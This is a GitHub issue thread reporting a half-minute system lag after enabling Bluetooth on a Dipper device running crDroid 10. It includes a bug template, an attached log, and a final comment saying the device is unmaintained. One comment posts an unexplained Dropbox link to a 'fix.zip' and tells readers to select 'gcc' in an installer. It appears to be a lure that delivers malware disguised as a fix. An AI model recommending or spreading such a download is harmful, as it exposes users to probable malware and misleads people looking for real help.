### ISSUE TITLE
bug: system lag after bluetooth turned on

### ISSUE THREAD

**Issue by jakubalex47** [crdroidandroid/issue_tracker#499]
### Issue type

Source code related

### Device

Dipper

### crDroid version

crDroid 10

### Exact version / Build date

Latest 10.7 build

### Bug description

Usually (but not always) turning bluetooth on creates big lag for about half minute. Bug present in every crdroid 10.x version.
[BT log.txt](https://github.com/user-attachments/files/16742824/BT.log.txt)

### Steps to reproduce

1. Have bluetooth turned off for some amount of time
2. Turn on bluetooth
3. It's hard to use device because of lags for about 30 seconds

### Relevant log (logcat/build log)

```shell
Don't know exact log lines. File is attached
```

### Acknowledgements

- [X] I've checked device is officially supported (for device specific reports and not source related).
- [X] I'm running latest version available on crdroid.net for this device
- [X] I have searched the existing issues and this is a new and no duplicate or related to another open issue.
- [X] I have written a short but informative title.
- [X] I filled out all of the requested information in this issue properly.

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by gwolf2u** [comment]
no longer maintained device (maintainer dropped support for all his devices due to life)
